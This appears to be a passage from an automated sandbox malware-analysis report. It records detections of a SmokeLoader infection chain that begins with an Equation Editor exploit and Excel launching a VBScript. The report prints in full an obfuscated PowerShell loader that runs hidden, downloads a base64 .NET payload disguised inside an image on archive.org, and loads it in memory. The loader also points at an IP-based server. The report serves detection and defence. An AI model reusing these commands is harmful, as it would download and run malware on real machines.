      • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        Click to see the 9 entries
        SourceRuleDescriptionAuthorStrings
        13.2.powershell.exe.2565ab4.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          14.2.RegAsm.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

            Exploits

            barindex
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.94.148.16, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3996, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3996, TargetFilename: C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3996, Protocol: tcp, SourceIp: 23.94.148.16, SourceIsIpv6: false, SourcePort: 80
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3416, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , ProcessId: 4052, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3416, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , ProcessId: 4052, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 208.64.171.230, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3416, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\dagifhd, CommandLine: C:\Users\user\AppData\Roaming\dagifhd, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\dagifhd, NewProcessName: C:\Users\user\AppData\Roaming\dagifhd, OriginalFileName: C:\Users\user\AppData\Roaming\dagifhd, ParentCommandLine: taskeng.exe {4EEBF1C0-00CF-4920-A83B-C678B0B7FDEB} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1], ParentImage: C:\Windows\System32\taskeng.exe, ParentProcessId: 424, ParentProcessName: taskeng.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\dagifhd, ProcessId: 1216, ProcessName: dagifhd
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3416, Protocol: tcp, SourceIp: 208.64.171.230, SourceIsIpv6: false, SourcePort: 443
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? 